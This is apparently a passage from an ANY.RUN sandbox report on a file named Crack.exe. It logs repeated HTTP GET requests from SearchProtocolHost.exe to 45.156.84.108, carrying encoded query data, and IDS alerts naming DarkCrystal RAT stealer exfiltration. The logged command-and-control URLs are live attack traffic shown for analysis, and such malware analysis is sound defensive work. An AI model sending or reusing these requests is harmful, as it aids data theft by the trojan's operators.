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
NL
text
104 b
malicious
2948
SearchProtocolHost.exe
GET
200
45.156.84.108:80
http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&91070d43273a2d2f20b3845ebe197c05=d1nIhF2NjJWN2kjZjRGOjRTM1E2YyQGOiVWYldzNmRmY5YTNmFTOwQTY0IiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W
NL
text
104 b
malicious
2948
SearchProtocolHost.exe
GET
200
45.156.84.108:80
http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&91070d43273a2d2f20b3845ebe197c05=d1nIyMjMkFWZ5QGOzkTZlRjYzMWZ4cjZ2MWMmFTO5Y2YmNjMyQjZ0UGMwIiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W
NL
text
104 b
malicious
2948
SearchProtocolHost.exe
GET
200
45.156.84.108:80
http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&4b3ed01d1b7d17d2374397bcf88db6a2=0VfiIiOicDMmNWM0YzMhJmZ3QDM1EGOwgDMwAjMzQGM3YmN0EGOiwiI5UGZ3EjY1MmMmljNzEGZ4IzY0QjZiN2NmRDM5UGOkBDOkFzY0kDNiJiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W
NL
text
104 b
malicious
2948
SearchProtocolHost.exe
GET
200
45.156.84.108:80
http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&4b3ed01d1b7d17d2374397bcf88db6a2=0VfiIiOicDMmNWM0YzMhJmZ3QDM1EGOwgDMwAjMzQGM3YmN0EGOiwiImJGMkljMzgzMyEzY2gDNzYWMyIzN3QzM4gDZ4EzMkhzMmZWO5YjM1IiOicTMlBTY5kjM5Y2YzAzMwYmYhRzM1QWMlVjYlRGOmJjYiwiIlZWZ0gTZzYTMzgjY5UDMwIDM5MTZmJjN2kjZhVjZ3QWY5QGNwMzNiJiOiYWOmFzYjNWOwEzM3YWZmZmY0YGO0MGMzITY3MWYwM2Nis3W
NL
text
104 b
malicious
2948
SearchProtocolHost.exe
GET
200
45.156.84.108:80
http://45.156.84.108/0EternalupdateLongpoll/flowerExternal76/default/wordpress/1Publicjavascriptmariadb/Protect/voiddb/2_0/imageLinejavascriptauth.php?P2phMj60SWLjzeuEarubUR=tlaQoVOeX&rkcF5G0aX=o8cnlmvr3pWW8n65wTSfD2xUI4R9f&17081d12d5d6392322cf36faf96b20d6=wNmNzYlVjZ5ETMzkzMjNjZ2IjYmNWM0ImZyATZ2UGN0YWO5kTZ0MmMwIzM2YzM4ETMyATM1cDN&cec6b04b0668728de3a6b2a93639588c=QNkFTO3Y2Y4gjZ2gTNhBTM0YjZmlDNlBzYilTZjVDMlVmYhBDOyETY&cdcb8a5f0961cc7a07b5ac3d675f9811=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
NL
text
104 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2948
SearchProtocolHost.exe
45.156.84.108:80
combahton GmbH
NL
malicious

DNS requests

No data

Threats

PID
Process
Class
Message
2948
SearchProtocolHost.exe
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
2948
SearchProtocolHost.exe
A Network Trojan was detected
ET MALWARE DarkCrystal Rat Stealer Data Exfiltration Activity
2948
SearchProtocolHost.exe
A Network Trojan was detected
ET HUNTING Observed Malicious Filename in Outbound POST Request (Information.txt)
1 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Crack.exe